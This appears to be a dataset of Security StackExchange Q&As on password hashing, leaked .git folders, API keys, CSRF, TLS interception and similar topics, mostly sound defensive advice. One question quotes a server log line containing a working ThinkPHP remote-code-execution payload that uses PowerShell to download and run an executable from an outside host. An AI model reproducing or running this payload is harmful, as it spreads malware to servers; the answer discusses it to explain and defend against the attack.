Dataset columns: source_id (int64, 1 – 4.64M), question (string, lengths 0 – 28.4k), response (string, lengths 0 – 28.8k), metadata (dict).
246,209
How unsafe would it be to publish the hashes of my passwords? I have written a Python script to help me remember my basic passwords (computer password, encrypted backup password, AppleID password, and KeyChain password). Hardcoded inside it is SHA256(MD5(password) + password + MD5(password)) for each password, and I periodically run it to keep my memory fresh. I have a private repo on GitLab where I store all generic files and I would like to commit this script. I can't see any problem doing this since, as far as I know, it would be impossible to recover the original passwords, but I prefer to ask experts, to be sure. EDIT: I'm adding an anonymized version of my script, so you can understand how it works:

from hashlib import md5, sha256
from getpass import getpass
from random import choice

def hash(pwd):
    pwd = pwd.encode()
    return sha256((md5(pwd).hexdigest()+str(pwd)+md5(pwd).hexdigest()).encode()).hexdigest()

dict = {'pass1': '6eaa49070c467d1edead2f6bc54cf42cdda11ae60d40aef2624a725871d3f452',
        'pass2': '240cbc4ba2661b333f9ad9ebec5969ca0b5cf7962a2f18a45c083acfd85dd062',
        'pass3': 'b018ed7bff94dbb0ed23e266a3c6ca9d1a1739737db49ec48ea1980b9db0ad46',
        'pass4': '7dd3a494aa6d5aa0759fc8ea0cd91711551c3e8d5fb5431a29cfce26ca4a2682'
        }

while True:
    tipologia, hash_result = choice(list(dict.items()))
    while True:
        pwd = getpass(f'Password {tipologia}: ')
        if hash(pwd) == hash_result:
            print('Correct!')
            break
        else:
            print('Wrong!')
There are a couple of problems with this approach.

First of all, you're using two plain cryptographic hash functions to hash your data. By themselves, cryptographic hash functions are designed to be fast. That means that it's extremely easy for an attacker to try to brute-force your password. The only time it's safe to use a plain cryptographic hash function to hash a secret is when that secret is a sufficiently long output of a CSPRNG (i.e., it has at least 128 bits of entropy). In order to even store this password securely on a system, you should be using a password hashing function like one of the crypt functions on your system, scrypt, or Argon2, which are designed to be iterated and expensive to prevent brute forcing.

Second, you have no salt for this password. As a result, anyone can just hash the output of a large password list as found in any of a number of breaches and create a giant table of passwords using this scheme. If you were using a secure password hashing system, it would require a reasonably long salt to randomize the password and prevent the generation of so-called rainbow tables, which make guessing a simple table lookup.

Third, you are using MD5, which should not be used for anything anymore. MD5 has been known to be totally insecure for 17 years, and there is no longer a justifiable reason to use it at all. Carnegie Mellon University says it is “unsuitable for further use,” and responsible parties do not use it.

Fourth, it is strongly preferable not to disclose the password hashes at all. Passwords are securely hashed both to make guessing expensive and to make them harder to guess even if the hashes are exposed, but if a person somehow gets your hashed password and it's guessable, they'll be able to guess it with enough effort. Your password must therefore be reasonably secure and contain sufficient entropy that it is computationally infeasible to guess even if the hash is exposed. It also needs to not be reused, because if it's ever exposed elsewhere, then you have to assume the attacker knows it (because usually, they can find it) and it then becomes just another entry in an easy word list to guess.
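For contrast, here is a minimal Python sketch (separate from the asker's script) of the kind of salted, deliberately expensive hashing the answer recommends, using hashlib.scrypt from the standard library (available when Python is built against OpenSSL 1.1+); the helper names and cost parameters are illustrative, not a tuned recommendation.

```python
import os
from hashlib import md5, sha256, scrypt

def weak_hash(pwd):
    # Roughly the construction from the question: fast, unsalted, easy to brute-force.
    p = pwd.encode()
    return sha256((md5(p).hexdigest() + pwd + md5(p).hexdigest()).encode()).hexdigest()

def strong_hash(pwd, salt=None):
    # Salted, memory-hard KDF from the standard library; cost parameters are illustrative only.
    salt = salt if salt is not None else os.urandom(16)
    digest = scrypt(pwd.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify(pwd, salt, expected):
    return scrypt(pwd.encode(), salt=salt, n=2**14, r=8, p=1) == expected

salt, digest = strong_hash("correct horse battery staple")
print(verify("correct horse battery staple", salt, digest))  # True
print(verify("wrong guess", salt, digest))                   # False
```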
{ "source": [ "https://security.stackexchange.com/questions/246209", "https://security.stackexchange.com", "https://security.stackexchange.com/users/252880/" ] }
246,256
As the security in-charge, I just noticed that one of our production web apps was attacked by some hackers. The attacker accessed the .git/objects/ files. I have already modified .htaccess to make .git and its contents inaccessible. The attacker may have got some model files, which include some data queries but not the database credentials. Should I be worried about it?
Should I be worried about it?

Worried? No, of course not. You should be absolutely terrified and have nightmares about this. A stolen .git directory means the attacker has the current and past source for the production server, the full history of all code since the start of the repository. With that, they can reconstruct your infrastructure and do white-box testing against the code. They will be looking for remote code execution, file inclusion, and SQL injection right now, and your developers must review every function handling user-supplied data (cookies, parameters, URL queries, etc.) for any possible vulnerability.

You made a good start by denying access to .git on the servers, but your work is just starting. Your code is now known to attackers, and they are inspecting it for vulnerabilities. If at any time someone hard-coded credentials in the code and committed them, the attacker has that password.

Things you should do:
- get a full code review from a reputable company
- consider using a Web Application Firewall
- install IPS/IDS (Intrusion Prevention/Detection Systems)
- change every single database password
- rename the database if possible

Be prepared to fight fine-tuned, targeted attacks.
{ "source": [ "https://security.stackexchange.com/questions/246256", "https://security.stackexchange.com", "https://security.stackexchange.com/users/252924/" ] }
246,319
When creating a self-signed certificate you are asked to enter some information (First Name, Last Name, Organization Unit, Organization, City, State,...). Is it possible to update any of those fields later? (E.g. my company changed its legal name and now I want to update the "Organization" name to reflect the new one.)
No. If you change that information on the certificate, the fingerprint changes and the signature becomes invalid. You will need to issue a new certificate.
{ "source": [ "https://security.stackexchange.com/questions/246319", "https://security.stackexchange.com", "https://security.stackexchange.com/users/236749/" ] }
246,434
I have an API key to a paid service. This API is invoked from an unauthenticated page on my site. I am proxying the request to the paid service through my backend server. I have also added CORS on the API to make sure it is called from my site. The above protections work when a user is accessing it through the browser. However, the API can be accessed from Postman, and this could result in me having a huge bill for the paid service. What is the best way for me to ensure that the API is only called from my JS client?
You can't. Even for things that aren't a website, like an embedded device, somebody could always open up the hardware and inspect the firmware or, in an extreme case, de-cap the chips and examine them with an electron microscope. For websites, it's utterly trivial. Anything and everything your client can do, so can any other client. That's inherent in the decentralized nature of the Internet and also in the way web pages work. There are things you can do to limit abuse, like having your server make the request (rather than the user's browser) and limiting the rate at which it will do so on your users' behalves. Authentication might potentially let you limit requests per user and/or pass along the bill. Actually controlling the client used to talk to your server (or the third-party one) is impossible, though. At best, you can obfuscate your code and try to hide the access key, but in the end, you can't hide it perfectly.
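To illustrate the mitigation the answer describes (the server makes the upstream call and rate-limits it), here is a minimal sketch using Flask and requests, both assumed to be available; the endpoint name, upstream URL, environment variable and limits are hypothetical placeholders, and a production setup would use shared storage (e.g. Redis) instead of an in-process dict.

```python
import os
import time
import requests
from flask import Flask, jsonify, request

app = Flask(__name__)
UPSTREAM = "https://paid-service.example.com/v1/lookup"  # hypothetical upstream API
API_KEY = os.environ["PAID_SERVICE_KEY"]                 # never shipped to the browser

WINDOW_SECONDS = 60
MAX_REQUESTS = 10
_hits = {}  # ip -> list of recent request timestamps (illustrative only)

@app.route("/api/lookup")
def lookup():
    # Crude per-IP rate limit so one client cannot run up the upstream bill.
    now = time.time()
    ip = request.remote_addr
    recent = [t for t in _hits.get(ip, []) if now - t < WINDOW_SECONDS]
    if len(recent) >= MAX_REQUESTS:
        return jsonify(error="rate limit exceeded"), 429
    _hits[ip] = recent + [now]

    # The proxy adds the secret key server-side; the client only ever sees this endpoint.
    upstream = requests.get(
        UPSTREAM,
        params={"q": request.args.get("q", "")},
        headers={"Authorization": f"Bearer {API_KEY}"},
        timeout=5,
    )
    return (upstream.text, upstream.status_code,
            {"Content-Type": upstream.headers.get("Content-Type", "application/json")})
```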
{ "source": [ "https://security.stackexchange.com/questions/246434", "https://security.stackexchange.com", "https://security.stackexchange.com/users/233843/" ] }
246,484
I've created a method to allow my project EditVideoBot to be 'decentralised': rather than the program processing and uploading all video editing requests on my own central server, users can volunteer to run this program on their computer and take some of the load off my server. I'd like to be able to start distributing the program, but I have one major concern: in order for the program to upload the final edited video to Twitter, it needs my Twitter API keys. Obviously, I need a way to encrypt the keys so they're not accessible to the user running the program (otherwise they have full access to my account). The bot is programmed in Python. I don't really know where to begin with keeping the keys secure if the program is running on another computer. Edit: If there were a method in the Twitter API to generate keys with restricted privileges (e.g. they can only access the media-upload endpoint but not any other endpoints), that would be the best method (like with Cloudflare's API). Then they'd forward the returned media ID to my server, where it has full access and posts the tweet attaching the media ID. I don't think they have that capability though, so another method is needed.
As specified, the problem is completely impossible. You can not, and should not attempt to, make a program - much less a script - do something its user can't see. There are many ways the attacker could break this. They could just read and analyze your python scripts (even if compiled, .pyc is easy to decompile). They could debug the program as it runs. They could intercept the network requests it makes to Twitter and pull the key out of there. They could replace the Python HTTPS library with one that wraps the official API and also logs a copy of the requests and responses to plain text. They could load your program as a library of another python program and programmatically examine its contents... Seriously, people keep asking about this and it just can not be done. As @Limit's comment says, your best bet is to expose an API from your server, and have your script call that with whatever it wants to put on Twitter. You can then validate the message before posting it, rate-limit each client's uploads, prevent abuse of the account such as deleting tweets or using DMs, and revoke third-party access to the account entirely just by disabling the endpoint on your server. This isn't enough to totally prevent abuse, but it'll do a lot better than any method of trying to hide secrets in a Python script. Another option is to use unique Twitter accounts per user. Either require the users to create/supply their own account (which your server then learns about and monitors for uploads, perhaps with specific tags or mentions), or automatically create one (well, as automatically as Twitter will let you get away with) for each node and don't use them for anything else (the user running the node would still have full access to the account in each case, but not to any other accounts). Or you could just have the nodes send the resulting videos to your server, and your server decides what to do with them. This is basically the same as the first viable approach, except the new endpoint is not "send video here to upload to Twitter", it's just "send video here when done" and you-the-server-owner decide what to do with it then.
{ "source": [ "https://security.stackexchange.com/questions/246484", "https://security.stackexchange.com", "https://security.stackexchange.com/users/244539/" ] }
247,844
Say I cloned a repo, then maybe worked on it a bit. Then I reverted/pushed all changes, so my friend has all the repo files. Is it safe for me to send him the .git folder? Is there any private information there, such as my username, my email, command history, or perhaps some secrets?
The contents of your .git repository may contain loose objects that you may not want to share (e.g. something you committed but changed your mind and deleted/amended), so there is no definite "yes, this is safe." A better way to share git repositories offline is to create a bundle file and send that to your friend, e.g.: git bundle create /tmp/myrepo.bundle --all Then you can send myrepo.bundle to your friend and they can clone from it like they would from any remote: git clone myrepo.bundle That would be a better way to make sure that you're not sharing loose objects that aren't intended to be seen by others.
{ "source": [ "https://security.stackexchange.com/questions/247844", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123249/" ] }
247,857
I signed into my bank's website and they demanded I change my username because it was found on the web--duh, it's my name and I've been online since the old BBS days. Huh? Since when are account names something to be protected? The rules presented for usernames included that it couldn't be part of my e-mail. However, after rejecting (firstname)(lastname) their system suggested (firstname)_(lastname). Is the latter really any more secure? Is there reason behind this or is it just "cargo cult" behavior?
{ "source": [ "https://security.stackexchange.com/questions/247857", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4020/" ] }
248,219
I've been watching videos of scammers being tricked. Frequently, the scammer makes their scam victim install some weird "remote desktop" program claimed to be for tech support purposes. These programs apparently allow the person connecting to the host (victim) computer to "black the screen" so that it becomes impossible for them to see what's being done. Why would any legitimate "remote desktop" software have such a feature? What non-scam purpose could there be for that?
So that passers-by cannot see what you are doing on your computer. If you are connecting remotely to a computer in an office, then everyone could see everything you type and you would not know. It is a basic, expected, and legitimate feature. (By the way, the top 8 remote desktop programs each have a "blank screen" feature for the express purpose of privacy. I could keep looking up more apps, but that would seem to be redundant.)
{ "source": [ "https://security.stackexchange.com/questions/248219", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255379/" ] }
248,222
I'm developing an application that will connect to Microsoft SQL Server in a local network. I'm considering whether these connections need to use TLS, or whether to leave it to the customer's administrators to use an encrypted tunnel, if they see fit. They may have other third-party applications also connecting to SQL Server, but I'm not familiar with the solutions available to administrators for an encrypted tunnel, besides a VPN (and maybe a load balancer?).

Questions:
- What would you do?
- What are the disadvantages of not using TLS in this context?
- Are there any solutions available for sending connections through an encrypted tunnel? (Examples of products, please.) I would prefer the simpler case, where I'm not responsible for the encryption.

Edit: I expect that SQL Server will be running in a local network.
{ "source": [ "https://security.stackexchange.com/questions/248222", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255384/" ] }
248,295
Update (April 15): The forked repo and the user do not exist any more. Yesterday, one of my GitHub projects was forked and there is a suspicious commit on the fork of the repo. As you can see from the commit the GitHub Actions configuration installs ngrok on the server, enables firewall access to rdp and enables rdp on the server. Can someone explain what the potential attacker is trying to achieve and why the person behind it couldn't do the same in their own repo? Is this a new type of attack and what should I do?
This isn't trying to make users install malware. This is trying to run malware on the build server. They fork the repository, install a malicious build script, create a Pull Request (PR) for the fork, and then the build will run for the PR and it will look like it's coming from your repository. When GitHub staff look at why their build servers are mining bitcoins, they'll see that it's a build job for your repository. (But they're probably smart enough to see it's from a malicious PR.)
{ "source": [ "https://security.stackexchange.com/questions/248295", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255510/" ] }
248,321
I have implemented an authentication system which works like this: upon successful login, the server takes the username of the client and encrypts it with AES-256. This ciphertext is stored in the client's browser, and when the client wants to do something which requires login, this ciphertext is sent to the server. The server decrypts the ciphertext and obtains the username of the client who is logged in. An attacker cannot breach a client's account because he/she doesn't know the encryption key, so it doesn't matter if the attacker knows the username. However, I'm worried that if a client's browser is exposed, the attacker will access both the ciphertext and the plaintext (username). Does this allow the attacker to "calculate" the encryption key, given that both the ciphertext and plaintext are known? That key is used for all clients, so if it's exposed the entire system is ruined.
In answer to your main question, AES-256 is secure as far as we know into the foreseeable future. However, your authentication scheme has several drawbacks.

First, if any request where the token is sent is compromised, or if the user installs a malicious add-on that can grab the encrypted username from their browser, that account is forever unusable. You are essentially creating a token to use for authentication that cannot ever be changed and that has a 1:1 relationship with the username. The only way to deny access if it is compromised is to shut down the account and force the user to create a new account with a different username. A much better way would be to generate a random token when the user authenticates and store that in the database, or generate a random value and encrypt that as the token. Then, if the account is compromised or if the user wishes to 'log out', you can remove that token and generate a new one.

Second, if your encryption key is ever compromised or if it is ever cracked somehow, the attacker can do anything as any user in your system. With a random-token approach, they would have to know the random part used to generate the token for each user: the attacker would have to have access to your database and your encryption key.
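A minimal sketch of the random-token approach suggested above, using Python's secrets module; the in-memory dict is for illustration only, and a real system would store (a hash of) the token in a database.

```python
import hashlib
import secrets

_sessions = {}  # sha256(token) -> username

def issue_token(username):
    token = secrets.token_urlsafe(32)   # unguessable and unrelated to the username
    _sessions[hashlib.sha256(token.encode()).hexdigest()] = username
    return token                        # handed to the client, e.g. as a cookie value

def lookup(token):
    return _sessions.get(hashlib.sha256(token.encode()).hexdigest())

def revoke(token):
    # "Log out" / invalidate a stolen token without touching the account itself.
    _sessions.pop(hashlib.sha256(token.encode()).hexdigest(), None)

t = issue_token("alice")
print(lookup(t))   # 'alice'
revoke(t)
print(lookup(t))   # None
```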
{ "source": [ "https://security.stackexchange.com/questions/248321", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255548/" ] }
248,357
I was wondering: when a hacker is trying to hack a Wi-Fi network, they would try to capture a handshake and then try to decrypt it, whereas when you want to log in to your Wi-Fi access point, you would type in your password, the password would be encrypted and then sent to the router, which would decrypt it using a key. So why can't a hacker just intercept the encrypted password (the handshake) and then just resend it to the router without having to decrypt it, like a replay attack?
Because the protocol is built to protect against that.

whereas when you wanna login to your wifi you would type in your password and the password would be encrypted then sent to the router which would decrypt it using a key

This is not how it works, on many levels. The password is never sent over the air, and it's a more complicated protocol, with multiple back-and-forth messages, commonly referred to as a four-way handshake. It uses a nonce to ensure that the packets are not equal. The nonce is basically a random number added by either party to explicitly avoid replay attacks, by forcing the content to differ. The access point gives the client a nonce, and the client uses that nonce in further calculations. An attacker replaying the data would be betrayed by the fact that the AP can tell that it's not using the nonce the AP supplied to the attacker. Furthermore, if we have a look at the four-way handshake, we see that neither party sends the actual secret over the air. They just prove to each other that they know it, so there's mutual authentication.
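A toy challenge-response sketch in Python (not the actual WPA2 four-way handshake) showing why a fresh nonce defeats replay: the response is bound to a value the verifier just generated, so a captured response is useless for the next exchange.

```python
import hashlib
import hmac
import secrets

SHARED_SECRET = b"wifi passphrase"   # never transmitted over the air

def make_challenge():                 # access-point side: fresh nonce per attempt
    return secrets.token_bytes(16)

def respond(nonce):                   # client side: proves knowledge of the secret
    return hmac.new(SHARED_SECRET, nonce, hashlib.sha256).digest()

def verify(nonce, response):          # access-point side
    return hmac.compare_digest(respond(nonce), response)

nonce1 = make_challenge()
resp1 = respond(nonce1)
print(verify(nonce1, resp1))   # True: legitimate exchange

nonce2 = make_challenge()      # the next connection uses a new nonce
print(verify(nonce2, resp1))   # False: replaying the captured response fails
```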
{ "source": [ "https://security.stackexchange.com/questions/248357", "https://security.stackexchange.com", "https://security.stackexchange.com/users/235772/" ] }
248,421
I'm looking into setting up 2-factor authentication for my registered accounts. However, when setting up 2FA, for example on Reddit, you need to write down backup codes in order to regain access to your account in case you lose your smartphone. I've already read this post. But the whole point of using password managers (yes, that's another thing) is that you don't have to write down all the passwords you've been using for all your registered accounts, and you can still have different passwords for all websites in case a website gets hacked and turns out to have stored all passwords in either plaintext/encrypted form (yes, yes, it still happens today). Writing down passwords, keys and codes is really old-school, so I feel that writing down backup codes for the platforms supporting 2FA is a real step back. In fact you'd have to store these codes, written on paper, in a safe. Is there any way I can be sure to regain access to my account that's been set up to use 2FA, when I lose my phone, without having to fall back to silly backup codes written down on paper for each website? Does this also mean that if you lose your phone and backup codes, you can't access your account at all?
Writing them down on paper is one of the simplest methods, guaranteed to be safe from malware and hardware failure for the average person. If you have a password manager, you can usually store secure notes too, which can hold backup codes. But if you do that, then attackers who manage to breach your password manager now have everything they need to get into your account. Some 2FA apps like Authy allow syncing and backing up codes across multiple devices, but this also means you've multiplied the weak links. You don't have to take a single approach for all of your accounts: perhaps you decide your social media account is not that vital and store its backup code in an online account or sync the 2FA token, while still writing your email backup code on a piece of paper because it's the gateway for every account you have.
{ "source": [ "https://security.stackexchange.com/questions/248421", "https://security.stackexchange.com", "https://security.stackexchange.com/users/236361/" ] }
248,428
I have worked on many API integration scenarios and I have used 2 approaches to authenticate the API calls.

Using API keys. For example, for a HubSpot integration I use this web call to get all the accounts using an API key: https://api.hubapi.com/companies/v2/companies/paged?hapikey=**********&properties=website&properties=mse_scan&properties=phone&limit=100

Using OAuth. For example, for SharePoint I create an app which generates a ClientID & ClientSecret, then inside my project's web.config I store the ClientID & ClientSecret:
<appSettings file="custom.config"> <add key="ClientId" value="e****7" /> <add key="ClientSecret" value="**=" /> </appSettings>

In both cases we have confidential info passed/stored, either the API key or the ClientID and ClientSecret. So from a security point of view, is it true that using OAuth isn't more secure than using API keys? Because if a malicious actor gets the API key then they can access our application, but if they get the ClientID and ClientSecret then they can also access it.
{ "source": [ "https://security.stackexchange.com/questions/248428", "https://security.stackexchange.com", "https://security.stackexchange.com/users/217508/" ] }
248,750
Client B connects to server A using TLS. B knows A by it's FQDN (e.g. www.alice.tld ), and by a root certificate for a CA that issued a certificate to A for this FQDN. Say B uses HTTPS and a standard web browser, and the certificate A holds comes with a chain of certificates to a CA which is in B's browser's whitelist. State actor M is able to coerce B's ISP to use routers M supplies (or equivalently, route B's traffic thru a router under control of M). M also is able to get certificates that B's browser will trust for any FQDN, because M has foot in one of the myriad of CAs with this ability. Correct me if I'm wrong, but AFAIK there's nothing built into TLS or HTTPS to stop M from having their router perform a MitM attack, where the router holds a rogue certificate for A's FQDN, uses it to impersonate A w.r.t. B, and connects to A as B would (here, unauthenticated). In theory, no public point-to-point protocol can be effective against such MitM attack. However, in practice, that could be detected Some link from A to B with trusted integrity will do: A can publish the certificates it uses (or just their hashes/fingerprint), and B can check if the certificate it uses as being A's is in this list. Some public service could try to do just that instead of A, collecting certificate(s) A uses thru a variety of links hopefully out of the influence of M, and republishing it as tweets, radio broadcasts, printed handouts, or other hard-to-censor means. It's enough to pass that same info on top of the TLS link using a protocol against which M has not yet implemented countermeasures. For a start, a new experimental HTTP(S) header where A sends the hash of the certificate it currently uses would do. Question: is there some ongoing effort to detect such MitM attack on TLS? What method(s) does it use?
Certificate transparency is a system that indexes all certificates. Domain owners can watch the certificate transparency logs to see if any certificate has been issued that they did not request. Browsers may check the certificate log to make sure that every certificate they encounter has been added to the log. So M can create a certificate and either:
- not add it to the log, in which case B's browser can detect that the certificate has not been added and is thus likely a fraudulent certificate; or
- add it to the log, in which case A can detect that an unauthorized certificate has been issued.
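As a sketch of the domain-owner side of this, here is a small Python example that queries crt.sh, a public certificate-transparency search service, using the requests library; the query parameters and JSON field names are taken from its public interface, which is not a guaranteed, official API.

```python
import requests

def certificates_for(domain):
    # Ask crt.sh for certificates logged for this domain, as JSON.
    resp = requests.get("https://crt.sh/",
                        params={"q": domain, "output": "json"},
                        timeout=30)
    resp.raise_for_status()
    return resp.json()

# Print a few recent entries; an owner would alert on issuers/names they never requested.
for entry in certificates_for("example.com")[:5]:
    print(entry.get("issuer_name"), entry.get("not_before"), entry.get("name_value"))
```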
{ "source": [ "https://security.stackexchange.com/questions/248750", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6211/" ] }
248,838
Spam is everywhere and everyone gets it (especially professors), but I noticed that my personal email does not get much spam. How can I get more? What are the most common ways of getting spam? Not just by forgetting to unsubscribe from a mailing list, but also: how do hackers get access to email addresses?
Spammers will "scrape" the internet for email addresses and use programs to collect millions of addresses. Or just download them. If you want your email address to be picked up by spammers, you need to expose your email in multiple different places. The common targets for spammers are social media sites and places like Pastebin.
{ "source": [ "https://security.stackexchange.com/questions/248838", "https://security.stackexchange.com", "https://security.stackexchange.com/users/232403/" ] }
248,853
Today, when my boss was talking with me, he suddenly said: "No, you don't need to worry about it. Every day you have 3 or 4 messages with agents on LinkedIn, right?" I was very, very surprised, because:
- I work at home.
- I don't use a VPN.
- I use a Linux (Ubuntu) system which I installed myself.
- I log in with my own Chrome / Gmail account.
- I use my personal Outlook.
- Every time I talk with interviewers, I use my own Zoom account.
- I use my own mobile phone and my own SIM card.
The only thing is that I daily use a laptop provided by the company. But as an IT engineer of 15 years, I cannot see how the company could view my data, especially how he knows there are 3 or 4 people I am talking with every day. The only possibility I can think of is: does LinkedIn provide a service that would send my data to our company?
Your boss is likely making assumptions. They can't read your messages on LinkedIn (unless you have your InMails forwarded to your work email and your company is monitoring your inbox, which is unlikely). The data LinkedIn publishes suggests that 80% of its users are open to hearing about new career opportunities, and these days if you can even spell "security" then you're likely already getting many InMails from recruiters hitting you up for jobs. I think maybe your boss is just probing. Don't address it; it's not their business.
{ "source": [ "https://security.stackexchange.com/questions/248853", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256430/" ] }
249,057
I was reading this article, which talks about a design to shorten URLs, and in the design section it says that the given URL can be hashed using a hashing algorithm such as MD5 and then encoded for display purposes using Base64 or a similar encoding. I am confused as to why we would need to encode a hashed string. Is it not safe to display an MD5 hash, or is there any other benefit? Can anyone shed some light on this? I tried searching online, and a lot of pages talk about encryption, etc., but not about the above scenario.
Hash functions output binary data, usually as a byte array. This cannot be displayed correctly, so you need an encoding. Transmitting binary data can also create problems, especially in protocols that are designed to deal with textual data, so to avoid that altogether we don't transmit binary data. Many of the programming errors related to encryption on Stack Overflow are due to sending binary data over text-based protocols. Most of the time this works, but occasionally it fails and the coders wonder about the problem: the binary data corrupts the network protocol. Therefore hex, Base64, or similar encodings are necessary to mitigate this. Base64 is not totally URL-safe, though one can make it URL-safe with a little work. Note that character encodings, unlike encryption, are reversible and don't require keys. This has nothing to do with security; it is about visibility and interoperability.
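A short Python demonstration of the point above: a hash digest is raw bytes, and hex or (URL-safe) Base64 are just reversible text encodings of those bytes.

```python
import base64
from hashlib import md5

digest = md5(b"https://example.com/some/long/url").digest()

print(digest)                                    # raw bytes, including unprintable characters
print(digest.hex())                              # 32 hexadecimal characters
print(base64.b64encode(digest).decode())         # shorter, but may contain '+', '/', '='
print(base64.urlsafe_b64encode(digest).rstrip(b"=").decode())  # URL-safe variant often used for short links
```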
{ "source": [ "https://security.stackexchange.com/questions/249057", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256774/" ] }
249,274
I have a Django application running on a DigitalOcean Ubuntu server. I am using NGINX and Daphne to serve the application because I am using Django Channels. My websockets keep crashing, and I noticed in the logs, when the crash occurs, this message:

127.0.0.1:46138 - - [11/May/2021:14:03:33] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/nagagewrehutkiz561.exe');start%20%SystemRoot%/Temp/nagagewrehutkiz561.exe" 404 2111

It looks very suspicious to me, but my knowledge of security is minimal. Can anyone help me determine if this is something I should be concerned about? It is a GET request that I did not submit (nobody else is using this server currently), but perhaps it is something automatically submitted by my browser?
Can anyone help me determine if this is something I should be concerned about?

Someone is trying to exploit a vulnerability on your server. References to cmd.exe, System.Net.WebClient and %SystemRoot% indicate this exploit is intended for a Windows server. The log shows your server returning HTTP 404 with 2111 bytes in the response (those are the last two values on the log line). That means your server does not have the vulnerable /public/index.php file, so no damage was done in this case.

Your websocket probably is dying because you aren't properly processing unexpected input, and this is a MASSIVE SECURITY ISSUE (bold capitals because I cannot use a blinking red text font). Failing to detect malformed input and react to it is the source of countless exploits. If you don't know much about security, you can be sure that your server will be hacked sooner or later. Take your server offline, install a Linux VM on your desktop, and train on your VM first. Read articles on Linux hardening, on securing Nginx and Django, and on secure coding. Your server can be a threat to anyone on the internet as soon as someone hacks it and turns it into a hacking platform to launch attacks.

nobody else is using this server currently

As soon as your server is reachable from the internet, that statement is not true anymore.
{ "source": [ "https://security.stackexchange.com/questions/249274", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257093/" ] }
249,291
Based on this question: why are there more research papers on Android malware than iOS malware?
Android has an 87% market share. Even if attackers manage to infect only a small percentage of devices, that is still a lot of devices they can cover in the small time frame they get before the vulnerability is fixed or the malware is detected.

Android suffers from the infamous fragmentation problem, due to which most Android devices lose security updates after 3-4 years and forever remain vulnerable to new vulnerabilities. This gives attackers a large time frame to spread malware through various channels until they are caught by the Google Play Store and anti-malware agencies. So more malware is built for Android devices.

Android allows flashing of custom images, which can be used to gain root access. This is useful for researchers: they can disable some SELinux policies, customise the kernel, attach a debugger to the malware, dump its memory and analyse the post-exploitation behaviour of malware in a real environment.

Qualcomm, Samsung and MediaTek release platform tools for their SoCs which can reflash even hard-bricked devices. This lowers research cost, and if experiments go wrong, there's a safe state to go back to without requiring specialised hardware programmers. Using these tools, the process can also be automated to test malware samples in different OS versions and in generic system images.
{ "source": [ "https://security.stackexchange.com/questions/249291", "https://security.stackexchange.com", "https://security.stackexchange.com/users/232403/" ] }
249,473
The Spring docs state:

Our recommendation is to use CSRF protection for any request that could be processed by a browser by normal users. If you are only creating a service that is used by non-browser clients, you will likely want to disable CSRF protection.

I'm interested in why. Why is it OK to disable CSRF protection when building a service whose only clients are non-browsers, but it should be enabled when the service talks to browser clients?
It comes down to the fact that CSRF is an attack against browsers, so if your service is exclusively used by non-browsers there's no point in using anti-CSRF defences, which can be expensive and so may be worth disabling.

When a browser interacts with a server, each request comes in separately, so if the service wants authentication it needs to add some scheme to connect requests (to avoid having the user authenticate every request). One common way is to set a cookie in the user's browser, which is automatically sent with every subsequent request by the browser.

Without protection:
1. Client logs into the service.
2. Server sets an http-only cookie.
3. A malicious script in the browser sends a request to e.g. transfer money to the attacker (the browser automatically attaches the cookie).
4. The user loses money.

vs. with protection:
1. Client logs into the service.
2. Server sets an http-only cookie.
3. A malicious script in the browser sends a request to e.g. transfer money to the attacker (the browser automatically attaches the cookie).
4. The server rejects the request because it doesn't have the correct CSRF fields.

Malicious scripts can make requests to the server, and the browser will helpfully include the cookie; however, the script won't have access to the cookie directly (assuming the right cookie option is specified). Therefore a protection against CSRF is to have something in the request separate from the cookie (i.e. a hidden field on a form) that can verify the request came from a proper form, rather than a script.

CSRF relies on the browser sending the cookie with a cross-site request automatically, since Javascript/the attacker's site doesn't have access to the cookie. CSRF protection relies on the server correlating something the browser sends automatically (the cookie) with something in the form (the token). A non-browser client is in control of both the token and the cookie, so it can make them match (if it can get the cookie at all). So there's no point having complicated CSRF protection if the service is never going to be accessed by a browser.

TL/DR - CSRF is inherently a browser attack, so protections against it are only required for services that might be accessed by a browser.
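To make the token mechanism concrete, here is a minimal, framework-free Python sketch of the synchronizer-token idea described above; the storage dict and session-id value are illustrative stand-ins for a real session store.

```python
import hmac
import secrets

_csrf_tokens = {}   # session_id (taken from the cookie) -> CSRF token

def issue_csrf_token(session_id):
    token = secrets.token_urlsafe(32)
    _csrf_tokens[session_id] = token
    return token          # embedded in the HTML form as a hidden field

def check_csrf(session_id, submitted_token):
    expected = _csrf_tokens.get(session_id)
    return expected is not None and hmac.compare_digest(expected, submitted_token)

sid = "abc123"                               # value of the session cookie
form_token = issue_csrf_token(sid)
print(check_csrf(sid, form_token))           # True: genuine form submission
print(check_csrf(sid, "attacker-guess"))     # False: forged cross-site request lacks the token
```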
{ "source": [ "https://security.stackexchange.com/questions/249473", "https://security.stackexchange.com", "https://security.stackexchange.com/users/245652/" ] }
249,489
